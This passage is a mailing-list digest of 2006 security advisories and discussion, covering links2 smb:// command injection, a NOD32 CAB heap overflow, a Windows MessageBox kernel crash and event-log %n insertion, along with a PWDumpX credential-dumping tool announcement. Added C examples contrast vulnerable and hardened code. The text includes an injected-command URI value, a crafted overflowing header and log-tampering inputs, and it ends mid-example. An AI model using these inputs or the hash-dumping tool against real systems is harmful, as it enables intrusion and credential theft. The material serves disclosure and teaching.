[Full-disclosure] [SECURITY] [DSA-1240-1] New links2 packages fix arbitrary shell command execution

2006-12-21 Thread Steve Kemp

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


- 
Debian Security Advisory DSA-1240-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
December 21, 2006
- 

Package        : links2
Vulnerability  : insufficient escaping
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2006-5925
Debian Bug     : 400718

Teemu Salmela discovered that the links2 character mode web browser
performs insufficient sanitising of smb:// URIs, which might lead to the
execution of arbitrary shell commands.

For the stable distribution (sarge) this problem has been fixed in
version 2.1pre16-1sarge1.

For the upcoming stable distribution (etch) this problem has been
fixed in version 2.1pre26-1.

For the unstable distribution (sid) this problem has been fixed in
version 2.1pre26-1.

We recommend that you upgrade your links2 package.

Upgrade instructions
- 

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 3.1 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1.diff.gz
    Size/MD5 checksum:    28658 a83c79990bbfb6f9ec26d737f767ee90
  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16.orig.tar.gz
    Size/MD5 checksum:  4217483 7baf4fc20cc244d80ead21cebff07d89
  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1.dsc
    Size/MD5 checksum:      841 ed4853334b7eebef055271df06cdcd7a

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_alpha.deb
    Size/MD5 checksum:  2110324 b3633fddb199c45339d3837bb0a519a0

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_amd64.deb
    Size/MD5 checksum:  2040922 5fb402e6a833709741d20238346c7597

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_arm.deb
    Size/MD5 checksum:  1996004 c7c79ddcb82d5758668ed71d74b9685f

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_i386.deb
    Size/MD5 checksum:  1997426 4c1ef611e31c57583f7471653962a84a

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_m68k.deb
    Size/MD5 checksum:  1904084 e5c777a07eaa88f4367b51d88c556a14

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_mips.deb
    Size/MD5 checksum:  2034596 22854de6eaf3aa1e392291760e85e5e8


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFil26wM/Gs81MDZ0RAvPPAJ9cxthVIvv2w2UmXuzhiiPR21aOjgCgo7J8
vA5Gql5VNhz4zm/QV5K4pig=
=JT/Q
-END PGP SIGNATURE-
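The advisory names the bug class, an smb:// URI reaching a shell without escaping, but not the code. The C example below is added here and is not links2 code: it shows the vulnerable shape, the URI spliced into a command string destined for /bin/sh, next to a hardened version that parses the host out of the smb:// URI, allow-lists its characters and passes it as a separate argv element so no shell is ever involved. The "smbclient -L" helper command, the allow-list and the sample URIs are assumptions made for the illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable pattern: the URI text is spliced into a command line that will be
 * handed to /bin/sh via system() or popen(). Shell metacharacters in the URI
 * survive untouched, so "smb://host;id" also runs "id". The command is only
 * built here, never executed. The smbclient invocation is a hypothetical
 * helper command, not what links2 runs. Returns a malloc'd string. */
char *build_shell_command_unsafe(const char *uri) {
    static const char prefix[] = "smbclient -L ";
    size_t n = sizeof prefix + strlen(uri);       /* sizeof prefix includes the NUL */
    char *cmd = malloc(n);
    if (cmd) {
        memcpy(cmd, prefix, sizeof prefix - 1);
        memcpy(cmd + sizeof prefix - 1, uri, strlen(uri) + 1);
    }
    return cmd;
}

/* Hardened pattern: parse the URI, accept only an allow-listed host syntax and
 * pass the host as its own argv element to execvp(), so no shell sees it. */
static int host_char_ok(unsigned char c) {
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == '-' || c == '.';
}

/* Copies the host part of smb://host[/...] into host; returns 0 on success,
 * -1 if the scheme is wrong, the host is empty or too long, or it contains a
 * character outside the allow-list (';', '|', '`', '$', spaces, ...). */
int parse_smb_host(const char *uri, char *host, size_t hostsz) {
    if (strncmp(uri, "smb://", 6) != 0) return -1;
    const char *h = uri + 6, *e = h;
    while (*e && *e != '/') e++;
    size_t len = (size_t)(e - h);
    if (len == 0 || len >= hostsz) return -1;
    for (size_t i = 0; i < len; i++)
        if (!host_char_ok((unsigned char)h[i])) return -1;
    memcpy(host, h, len);
    host[len] = '\0';
    return 0;
}

/* Fills argv for execvp("smbclient", argv); returns argc, or -1 on rejection. */
int build_argv_safe(const char *uri, char *host, size_t hostsz, const char *argv[4]) {
    if (parse_smb_host(uri, host, hostsz) != 0) return -1;
    argv[0] = "smbclient"; argv[1] = "-L"; argv[2] = host; argv[3] = NULL;
    return 3;
}

/* Demonstrations on constructed URIs (not taken from the advisory). */
int demo_unsafe_keeps_metachars(void) {
    char *cmd = build_shell_command_unsafe("smb://fileserver;id");
    int hit = cmd != NULL && strcmp(cmd, "smbclient -L smb://fileserver;id") == 0;
    free(cmd);
    return hit;
}

int demo_safe_rejects(void) {
    char host[64]; const char *argv[4];
    return build_argv_safe("smb://fileserver;id", host, sizeof host, argv) == -1;
}

int demo_safe_accepts(void) {
    char host[64]; const char *argv[4];
    int argc = build_argv_safe("smb://fileserver/public", host, sizeof host, argv);
    return argc == 3 && strcmp(argv[2], "fileserver") == 0;
}

int main(void) {
    printf("unsafe keeps ';id': %d\n", demo_unsafe_keeps_metachars());
    printf("safe rejects:       %d\n", demo_safe_rejects());
    printf("safe accepts:       %d\n", demo_safe_accepts());
    return 0;
}
```

The allow-list is deliberately narrow; the point is that the fix is not "escape the metacharacters" but "never build a shell command from the URI at all".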

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] New Windows tool - PWDumpX v1.1 (with CacheDump functionality)

2006-12-21 Thread Reed Arvin
New Windows tool - PWDumpX v1.1 (with CacheDump functionality)

Tool location: http://reedarvin.thearvins.com/tools/PWDumpX11.zip

=

Description:

PWDumpX version 1.1 allows a user with administrative privileges to
retrieve the domain password cache, password hashes and LSA secrets
from a Windows system. This tool can be used on the local system or on
one or more remote systems.

If an input list of remote systems is supplied, PWDumpX will attempt
to obtain the domain password cache, the password hashes and the LSA
secrets from each remote Windows system in a multi-threaded fashion
(up to 64 systems simultaneously).

The domain password cache, password hashes and LSA secrets from remote
Windows systems are encrypted as they are transferred over the network.
No data is sent over the network in clear text.

This tool is a completely re-written version of CacheDump, PWDump3e
and LSADump2 which integrates suggestions/bug fixes for PWDump3e and
LSADump2 found on various web sites, etc.

Source code included.

Credits:

My intent with including the source code along with this tool is to
give something back to the I.T. security community. I learned a lot
while creating PWDumpX but I could not have done it without the
original source code for CacheDump, PWDump2, PWDump3e, and LSADump2.
So...thanks to the creators of these tools for being generous enough
to include the source code with these tools so that hungry minds can
learn new things.

=

Tool homepage: http://reedarvin.thearvins.com/tools.html

Written by Reed Arvin [EMAIL PROTECTED].

Thank you,

Reed Arvin [EMAIL PROTECTED]



Re: [Full-disclosure] [WEB SECURITY] comparing information security to other industries

2006-12-21 Thread Jason Muskat, GCFA, GCUX, de VE3TSJ
Hello,

People, programmers, computers, software, design patterns, systems, and
infrastructure are constantly changing, often being reinvented. As such,
they will never be stable.

Concrete of a type is always the same and therefore predictable. One can
state with certainty that a concrete slab will perform to design. This will
never be possible in IT.

Many commercially produced software products don't have any warranty. Many
even state that the software is not warranted for any function or purpose.
... The fact that the software does something that one thinks it should do
is incidental.


Regards,

-- 
Jason Muskat  | GCFA, GCUX - de VE3TSJ

TechDude
e. [EMAIL PROTECTED]
m. 416 .414 .9934

http://TechDude.Ca/



From: KT [EMAIL PROTECTED]
Date: Tue, 19 Dec 2006 12:16:29 -0800
To: full-disclosure@lists.grok.org.uk, [EMAIL PROTECTED]
Subject: [WEB SECURITY] comparing information security to other industries

So we have been dealing with information security for the last 20 years and
still the world at large is lost. We still see banks vulnerable to trivial
XSS attacks and software broken by buffer overflows. How do we compare to
other industries like construction, engineering, finance? What I am trying
to figure out is how mature we are and how long it will take for us to get
stable?



[Full-disclosure] Windows is very holy

2006-12-21 Thread Aaron Gray

Windows is very very holy.

Microsoft may draw castles guarded by lions round PCs in adverts but we
know better.

Aaron

[Full-disclosure] NOD32 Antivirus CAB parsing Arbitrary Code Execution Advisory

2006-12-21 Thread security
n.runs AG  
http://www.nruns.com/  security at nruns.com
n.runs-SA-2006.005   21-Dec-2006


Vendor: ESET, http://eset.com
Affected Products:  ESET NOD32 Antivirus
Vulnerability:  Arbitrary Code Execution (remote) 
Risk: HIGH



Vendor communication:

  2006/08/24    initial notification of ESET
  2006/08/28    ESET response
  2006/08/29    PGP key exchange
  2006/08/29    PoC files sent to ESET
  2006/09/06    ESET initial feedback
  2006/09/08    ESET confirmed the bug and fixed it
  2006/09/08    ESET made the updates available


Overview:
 
Founded in 1992, ESET is a global provider of security software for
enterprises and consumers. ESET's award-winning, antivirus software system,
NOD32, provides real-time protection from known and unknown viruses,
spyware, rootkits and other malware. NOD32 offers the smallest, fastest and
most advanced protection available, with more Virus Bulletin 100% Awards
than any other antivirus product. ESET was named to Deloitte's Technology
Fast 500 five years running, and has an extensive partner network, including
corporations like Canon, Dell and Microsoft. ESET has offices in Bratislava,
SK; Bristol, U.K.; Buenos Aires, AR; Prague, CZ; San Diego, USA; and is
represented worldwide in more than 100 countries. 
The broad product platform protects Windows, Linux, Novell and MS DOS
machines.

Description:
A remotely exploitable vulnerability has been found in the file parsing
engine.

In detail, the following flaw was determined:

- Heap Overflow through Integer Overflow in .CAB file parsing

This problem can lead to remote arbitrary code execution if an attacker
carefully crafts a file that exploits the aforementioned vulnerability. The
vulnerability is present in NOD32 Antivirus software versions prior to the
update v.1.1743.

Solution:
The vulnerability was reported on Aug 24 and an update was issued on
Sep 08 that fixes it through the regular update mechanism.



Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 


The information provided is released by n.runs as is without warranty of
any kind. n.runs disclaims all warranties, either express or implied, except
for the warranties of merchantability. In no event shall n.runs be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if n.runs
has been advised of the possibility of such damages.
Distribution or reproduction of the information is permitted provided that
the advisory is not modified in any way.

Copyright 2006 n.runs. All rights reserved. Terms of use.
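n.runs gives the bug class, an integer overflow in a size computation that becomes a heap overflow, but no details of the NOD32 parser. The C example below is added here and is neither ESET's code nor the real CAB layout: it uses a made-up two-field block header to show how a 32-bit count*size product wraps to a small allocation while the copy loop still trusts the original fields, and what the overflow-checked version has to test before it calls malloc(). The header layout and the sample inputs are constructed for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical container header (NOT the real CAB layout, and not ESET's
 * parser): a block count and a per-block size, both little-endian uint32,
 * followed by count*size bytes of block payload. */
#define HDR_LEN 8

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Vulnerable pattern: count*size is computed in 32 bits and wraps, so the
 * heap allocation is tiny while the copy loop trusts count and size. To keep
 * the demo safe it does not perform the copy; it reports whether the loop
 * would write past the allocation. Returns 1 (would overflow), 0 (would not),
 * -1 (input too short for the header). */
int naive_parser_overflows(const uint8_t *buf, size_t len, uint32_t *alloc_out) {
    if (len < HDR_LEN) return -1;
    uint32_t count = rd32(buf), size = rd32(buf + 4);
    uint32_t alloc = count * size;              /* wraps modulo 2^32 */
    uint64_t written = (uint64_t)count * size;  /* what a memcpy loop would write */
    if (alloc_out) *alloc_out = alloc;
    return written > alloc;
}

/* Hardened parser: reject zero or overflowing sizes before allocating, and
 * never trust header fields beyond what the input buffer actually carries. */
int checked_parse(const uint8_t *buf, size_t len, uint8_t **out, size_t *out_len) {
    if (len < HDR_LEN) return -1;
    uint32_t count = rd32(buf), size = rd32(buf + 4);
    if (count == 0 || size == 0) return -1;
    if (count > SIZE_MAX / size) return -1;     /* count*size would overflow size_t */
    size_t total = (size_t)count * size;
    if (total > len - HDR_LEN) return -1;       /* header promises more than exists */
    uint8_t *dst = malloc(total);
    if (!dst) return -1;
    const uint8_t *src = buf + HDR_LEN;
    for (uint32_t i = 0; i < count; i++)
        memcpy(dst + (size_t)i * size, src + (size_t)i * size, size);
    *out = dst;
    *out_len = total;
    return 0;
}

/* Constructed inputs. evil: count = 0x01000001, size = 0x100; the product
 * 0x1_0000_0100 wraps to 0x100 in 32 bits. good: 2 blocks of 4 bytes. */
static const uint8_t evil_hdr[HDR_LEN] = {0x01,0x00,0x00,0x01, 0x00,0x01,0x00,0x00};
static const uint8_t good_buf[HDR_LEN + 8] = {2,0,0,0, 4,0,0,0, 'A','B','C','D','E','F','G','H'};

int demo_naive_wraps(void) {
    uint32_t alloc = 0;
    return naive_parser_overflows(evil_hdr, sizeof evil_hdr, &alloc) == 1 && alloc == 0x100;
}
int demo_checked_rejects(void) {
    uint8_t *o = NULL; size_t n = 0;
    return checked_parse(evil_hdr, sizeof evil_hdr, &o, &n) == -1;
}
int demo_checked_accepts(void) {
    uint8_t *o = NULL; size_t n = 0;
    int ok = checked_parse(good_buf, sizeof good_buf, &o, &n) == 0 &&
             n == 8 && memcmp(o, "ABCDEFGH", 8) == 0;
    free(o);
    return ok;
}

int main(void) {
    printf("naive parser wraps:   %d\n", demo_naive_wraps());
    printf("checked rejects evil: %d\n", demo_checked_rejects());
    printf("checked accepts good: %d\n", demo_checked_accepts());
    return 0;
}
```

The second check in checked_parse() matters as much as the first: on a 64-bit build the multiplication does not overflow size_t at all, and it is the comparison against the bytes actually present that stops the oversized copy.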



[Full-disclosure] Tele2 - Versatel and Vivendi - exploit PATCHED

2006-12-21 Thread CyTRAP Labs - advisory
This vulnerability has been patched successfully by the vendor as tests by 
various parties have demonstrated, more details here:

http://cytrap.eu/blog/?p=133

Happy Holidays
Urs E. Gattiker
CyTRAP Labs and www.CASEScontact.org


At 21:23 2006-10-04, you wrote:
--

Message: 2
Date: Wed, 04 Oct 2006 13:56:27 +0200
Subject: [Full-disclosure] Tele2 - Versatel and Vivendi - exploit
To: full-disclosure@lists.grok.org.uk
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=us-ascii; format=flowed

Tele 2 has recently announced that it is selling its Benelux assets
to Versatel and yesterday it informed the media that it intends to do
the same with its French assets, selling those to Vivendi.

The company that touts itself as providing economical broadband and
telecommunication services does, however, have a slight problem
regarding information security.

A vulnerability is being taken advantage of by various groups of
people and, in turn, this could harm home users that receive their
broadband and fixed-line services from Tele2.

In fact, several security features can be de-activated allowing a
malicious user to take control of a user's PC, his broadband
connection as well as his phone line as described here with a screen shot:

http://cytrap.eu/blog/?p=57

This is another example where users face risks regarding their
internet connection that they might not even be aware of. Another one of
those is the recent Fon example also circulated on this list.

Urs E. Gattiker
CyTRAP Labs & CASEScontact.org



[Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread 3APA3A
Dear full-disclosure@lists.grok.org.uk,

  Since  it's  already  wide  spread on the public forums and exploit is
  published  on  multiple  sites and there is no way to stop it, I think
  it's time to alert lists about this.

  On the one of Russian forums:
  http://www.kuban.ru/forum_new/forum2/files/19124.html
  message  was  published  by  NULL  about  vulnerability  in Windows on
  processing   MessageBox()   with   MB_SERVICE_NOTIFICATION   flag  and
  message/caption  beginning with \??\. Vulnerability seems to be memory
  corruption  in  kernel  and  causes  system  crash  or  hang after few
  attempts.  It  seems  to happen because message is logged to event log
  and may point to some problem with event logs processing.

  Vulnerability details and code may be found here:
  http://www.security.nnov.ru/Gnews944.html

  There  is  potential  remote  exploitation vector if some service uses
  user-supplied  input  for  MessageBox() function. Messenger service is
  not  vulnerable  in  this way, because it prepends user-supplied input
  with additional string.

  I contacted Microsoft on this issue on December, 16.

-- 
http://www.security.nnov.ru
 /\_/\
{ , . } |\
+--oQQo-{ ^ }-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/



[Full-disclosure] SinFP 2.06, now works under big-endian architectures

2006-12-21 Thread GomoR
Hello,

SinFP is a new approach to OS fingerprinting, which bypasses 
limitations that nmap has. More info:
http://www.gomor.org/sinfp .

SinFP now has 140 signatures.

You can download it via CPAN, or via SourceForge:
https://sourceforge.net/projects/sinfp

Also, two benchmarks versus Nmap have been done:
http://www.phocean.net/index.php/post/2006/12/17/SinFP
http://www.computerdefense.org/?p=173

This new release has been tested under Solaris 8/SPARC, 
and Mac OS X/PPC.

Example advanced usage:
# sinfp.pl -kai www.heise.de
P1: B0 F0 W0 O0 M0
P2: B3 F0x12 W4320 O0204010303000101080a4445414401010402 M1440
P3: B11123 F0x14 W0 O0 M0
IPv4: unknown
##
## Retry in offline active mode:
##
# sinfp.pl -1 -f sinfp4-193.99.144.85.80.pcap -H
P2: B3 F0x12 W4320 O0204010303000101080a4445414401010402 M1440
IPv4: BH0FH0WH2OH0MH1/P2: Unix: IRIX: 6.5

-- 
  ^  ___  ___ http://www.GomoR.org/  -+
  | / __ |__/  Systems & Security Engineer |
  | \__/ |  \ ---[ zsh$ alias psed='perl -pe ' ]---|
  +--  Net::Frame = http://search.cpan.org/~gomor/  ---+



[Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread 3APA3A
Dear full-disclosure@lists.grok.org.uk,

There  is  interesting  thing  with  event  logging on Windows. The only
security  aspect  of  it  is  event log record tampering and performance
degradation,  but  it may become sensitive if some 3rd party software is
used for automated event log analysis.

The   problem   is   a  kind  of  Format  string  vulnerability  where
user-supplied  input  is  used  for  event log record. For ReportEvent()
function  %1,  %2,  etc  have  a  special  meaning and are replaced with
corresponding  string  from  lpStrings.  The problem is this can be done
recursively.  That is, %2 argument can include itself. This fact doesn't
lead  to  any  buffer  overflow,  but  you  can  fill entire buffer with
relatively small argument.

Most  services  do  not escape any user-supplied input when constructing
log  event.  You  can  see very interesting event log entries if you try
something like:

net send SOMEHOST %2

or

net use \\SOMEHOST\IPC$ /user:%1%2%3


-- 
http://www.security.nnov.ru
 /\_/\
{ , . } |\
+--oQQo-{ ^ }-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
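To make the %n substitution concrete, here is an added C model of the insert expansion described above; it is not Windows code and not a test of the real event viewer or FormatMessage(). expand_once() does the single pass that FormatMessage() performs on a template and its lpStrings; expand_recursive() re-runs that pass to a fixed point, which is the behaviour claimed for the viewer, and shows why a short self-referencing insert such as "%1%1" fills any buffer. The template, the inserts and the pass bound are constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One substitution pass over a message template: each %1..%9 is replaced by
 * inserts[n-1]; anything else, including %n with no matching insert, is
 * copied through. (Real FormatMessage also knows %0, %% and %n!fmt!, which
 * this model leaves out.) Returns the number of substitutions made, or -1
 * if out (outsz bytes) is too small for the result. */
int expand_once(const char *tmpl, const char *const *inserts, int ninserts,
                char *out, size_t outsz) {
    size_t o = 0;
    int subs = 0;
    for (const char *p = tmpl; *p; p++) {
        const char *piece = p;
        size_t plen = 1;
        if (*p == '%' && p[1] >= '1' && p[1] <= '9' && (p[1] - '1') < ninserts) {
            piece = inserts[p[1] - '1'];
            plen = strlen(piece);
            p++;                                /* skip the digit */
            subs++;
        }
        if (o + plen >= outsz) return -1;       /* leave room for the NUL */
        memcpy(out + o, piece, plen);
        o += plen;
    }
    out[o] = '\0';
    return subs;
}

/* Re-run the pass until a fixed point, as a viewer that re-formats its own
 * output would. An insert that itself contains %n is expanded again, and an
 * insert such as "%1%1" standing for %1 doubles on every pass. max_passes
 * bounds the run; returns the number of substituting passes, or -1 if the
 * bound or the buffer was exhausted. */
int expand_recursive(const char *tmpl, const char *const *inserts, int ninserts,
                     char *out, size_t outsz, int max_passes) {
    char *cur = malloc(outsz), *next = malloc(outsz);
    int passes = 0;
    if (!cur || !next || outsz == 0) { free(cur); free(next); return -1; }
    strncpy(cur, tmpl, outsz - 1);
    cur[outsz - 1] = '\0';
    for (;;) {
        int subs = expand_once(cur, inserts, ninserts, next, outsz);
        if (subs < 0) { passes = -1; break; }          /* grew past the buffer */
        if (subs == 0) { strcpy(out, next); break; }   /* nothing left to expand */
        if (++passes > max_passes) { passes = -1; break; }
        char *t = cur; cur = next; next = t;
    }
    free(cur);
    free(next);
    return passes;
}

/* Constructed sample: a logon-failure template whose second insert is
 * attacker-controlled and names %1 twice; and a purely self-referencing one. */
static const char *const sample_inserts[] = { "alice", "%1%1" };
static const char *const self_insert[]    = { "%1%1" };

int demo_single_pass(void) {
    char out[64];
    return expand_once("%1 failed to log on from %2", sample_inserts, 2, out, sizeof out) == 2
        && strcmp(out, "alice failed to log on from %1%1") == 0;
}
int demo_fixed_point(void) {
    char out[64];
    return expand_recursive("%1 failed to log on from %2", sample_inserts, 2, out, sizeof out, 8) == 2
        && strcmp(out, "alice failed to log on from alicealice") == 0;
}
int demo_runaway(void) {
    char out[64];
    return expand_recursive("%1", self_insert, 1, out, sizeof out, 8) == -1;
}

int main(void) {
    printf("single pass ok:   %d\n", demo_single_pass());
    printf("fixed point ok:   %d\n", demo_fixed_point());
    printf("runaway detected: %d\n", demo_runaway());
    return 0;
}
```

Whichever display path does the re-expansion, an analyzer that reads the message id and the raw inserts from the record (the point made in the replies below) only ever sees the literal "%1%1"; only the text-rendering side is affected.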



[Full-disclosure] n3td3v calls on month of bug campaigns to stop

2006-12-21 Thread n3td3v
[introduction]
n3td3v is deeply sad at the new trend of morally accepted blackmail by
the security community, known better as a month of bugs.

sincere researchers are coming forward more frequently to threaten
companies with a month of vendor bugs.

because they are known to be sincere they are morally left off the
hook from what is known by n3td3v to be straight forward blackmail.

blackmail is illegal, for this reason n3td3v wishes to make the
following recommendations:

[1]bug a day for a month campaigns are blackmail on the part of the
researcher, all should be outlawed by government.

[2]n3td3v calls on the government to make it highly illegal and
morally unacceptable to threaten a month of bugs for a vendor and its
customers

[3]security researchers think its fun but all it amounts to is blackmail

[4]all blackmail attempts shouldn't be dressed up as harmless fun

[5]governments need to wake up and swiftly arrest those making month
of bug claims in the future

[6]corporations and their consumers shouldn't be scaremongered and
threatened by individuals

[7]researchers shouldn't use their real name or real place of
employment and expect exclusion from legal action against blackmail

[8]researchers shouldn't be allowed to profit or gain career
opportunities by such claims to action by the researcher

[9]researchers should be taken into custody, questioned and have their
hardware obtained for forensic analysis before a month of bugs is due
to start

[10]individuals threatening to carry out a month of bugs shouldn't be
labelled as security researchers by the media and security experts

[11]such individuals should be clearly labelled as criminals,
malicious attackers and blackhats, no matter what other friendly
or useful research they've carried out in the past.

[media dork reference]
http://news.com.com/2061-10793_3-6144833.html



Re: [Full-disclosure] n3td3v calls on month of bug campaigns to stop

2006-12-21 Thread Timo Schoeler
n3td3v wrote:
 [introduction]
 n3td3v is deeply sad at the new trend of morally accepted blackmail by
 the security community, known better as a month of bugs.
 
 sincere researchers are coming forward more frequently to threaten
 companies with a month of vendor bugs.
 
 because they are known to be sincere they are morally left off the
 hook from what is known by n3td3v to be straight forward blackmail.
 
 blackmail is illegal, for this reason n3td3v wishes to make the
 following recommendations:
 
 [1]bug a day for a month campaigns are blackmail on the part of the
 researcher, all should be outlawed by government.
 
 [2]n3td3v calls on the government to make it highly illegal and
 morally unacceptable to threaten a month of bugs for a vendor and its
 customers
 
 [3]security researchers think its fun but all it amounts to is blackmail
 
 [4]all blackmail attempts shouldn't be dressed up as harmless fun
 
 [5]governments need to wake up and swiftly arrest those making month
 of bug claims in the future
 
 [6]corporations and their consumers shouldn't be scaremongered and
 threatened by individuals
 
 [7]researchers shouldn't use their real name or real place of
 employment and expect exclusion from legal action against blackmail
 
 [8]researchers shouldn't be allowed to profit or gain career
 opportunities by such claims to action by the researcher
 
 [9]researchers should be taken into custody, questioned and have their
 hardware obtained for forensic analysis before a month of bugs is due
 to start
 
 [10]individuals threatening to carry out a month of bugs shouldn't be
 labelled as security researchers by the media and security experts
 
 [11]such individuals should be clearly labelled as criminals,
 malicious attackers and blackhats, no matter what other friendly
 or useful research they've carried out in the past.
 
 [media dork reference]
 http://news.com.com/2061-10793_3-6144833.html

there's one extremely simple solution: write good code!

furthermore, vendors who sell crap deserve to be blamed to do so. 
Mercedes-Benz' sales of their E-Class went down enormously when the 
fact was known that it was extremely poorly engineered, especially wrt 
electrics.

no one could fill a whole month of bugs (a bug/day) when the vendor did 
good (!) work.

it's, again, a thing capitalism enforces. vendors sell immature 
soft-/hardware, and services, and let the customers do the beta testing. 
*that* should be defined illegal by governments! but guess what -- most, 
if not all of the western countries can be defined as fascist countries 
as (huge) corporations are the real entities in power.

that given, the guys you call 'blackmailers' are like Robin Hood. 
they're heroes.

(it was the same with brazil some months ago; they told the pharmacy 
corporations to sell their drugs for HIV infected people at a reasonable 
price to the brazilian govt, otherwise the govt would ignore patents and 
re-engineer and build the drugs themselves. again, the govt was 
perfectly right. however, pharmacy corporations' PR guys knew this and 
so they sold and sell the medicine to the price brazil was willing to 
pay...)

-- 
Timo Schoeler | http://riscworks.net/~tis | [EMAIL PROTECTED]
RISCworks -- Perfection is a powerful message
Ex-ISP | RISC aficionados | Networking, Security, OpenBSD services
GPG Key fingerprint = l33t

What are you gonna do? Release the dogs?! Or the bees?! Or dogs with 
bees in their mouth so that when they bark they shoot bees at you? 
(Homer J. Simpson)



Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread endrazine
Heya lists & 3APA3A,

3APA3A wrote:
 Dear full-disclosure@lists.grok.org.uk,

 There  is  interesting  thing  with  event  logging on Windows. The only
 security  aspect  of  it  is  event log record tampering and performance
 degradation,  but  it may become sensitive is some 3rd party software is
 used for automated event log analysis.

 The   problem   is   a  kind  of  Format  string  vulnerability  where
 user-supplied  input  is  used  for  event log record. For ReportEvent()
 function  %1,  %2,  etc  have  a  special  meaning and are replaced with
 corresponding  string  from  lpStrings.  
It looks more like a variable replacement (like $0 $1 ... in bash shell) 
than a format string issue to me.
And it seems indeed to be a relevant information disclosure bug.


Cheers,

endrazine-



Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread 3APA3A
Dear lists,

in  another  Russian  forum, Killer{R} made analysis on this issue using
Windows 2000 sources:

http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=21&m=140672

The problem is in win32k.sys' function GetHardErrorText, which tries to
prepare EXCEPTION data for the event log, and seems to be some very old
debugging feature accidentally left in production code since Windows 2000.

In Windows 2000 there is a piece of code like:

} else if ((asLocal.Length > 4) && !_strnicmp(asLocal.Buffer, "\\??\\", 4)) {
    strcpy( asLocal.Buffer, asLocal.Buffer+4 );

Killer{R} assumes the problem is in strcpy(), because it should not be
used for overlapping buffers, but at least the ANSI implementation of strcpy
from Visual C should be safe in this very situation (copying to lower
addresses). Maybe the code is different for Windows XP or the vulnerability is
later in the code.



--Thursday, December 21, 2006, 2:58:17 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

3 Dear full-disclosure@lists.grok.org.uk,

3   Since  it's  already  wide  spread on the public forums and exploit is
3   published  on  multiple  sites and there is no way to stop it, I think
3   it's time to alert lists about this.

3   On the one of Russian forums:
3   http://www.kuban.ru/forum_new/forum2/files/19124.html
3   message  was  published  by  NULL  about  vulnerability  in Windows on
3   processing   MessageBox()   with   MB_SERVICE_NOTIFICATION   flag  and
3   message/caption  beginning with \??\. Vulnerability seems to be memory
3   corruption  in  kernel  and  causes  system  crash  or  hang after few
3   attempts.  It  seems  to happen because message is logged to event log
3   and may point to some problem with event logs processing.

3   Vulnerability details and code may be found here:
3   http://www.security.nnov.ru/Gnews944.html

3   There  is  potential  remote  exploitation vector if some service uses
3   user-supplied  input  for  MessageBox() function. Messenger service is
3   not  vulnerable  in  this way, because it prepends user-supplied input
3   with additional string.

3   I contacted Microsoft on this issue on December, 16.



-- 
~/ZARAZA
http://www.security.nnov.ru/
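The fragment's in-place prefix removal is worth seeing next to its defined-behaviour form. The C example below is added here and is not the win32k.sys code: it uses a simplified stand-in for a counted ANSI_STRING (Length/MaximumLength/Buffer, an assumption made for the example) and shows the strcpy() shape beside a memmove() version that takes its byte count from Length rather than from a terminator and updates Length afterwards. It does not claim to be the cause of the crash, which the thread leaves open.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Simplified stand-in for the NT ANSI_STRING counted string: Length is the
 * number of bytes in use (no terminator counted), MaximumLength the buffer
 * size. Assumed here for illustration; the real kernel structure is not used. */
typedef struct {
    unsigned short Length;
    unsigned short MaximumLength;
    char *Buffer;
} counted_string;

/* The shape of the quoted Windows 2000 fragment: drop a leading "\??\" with an
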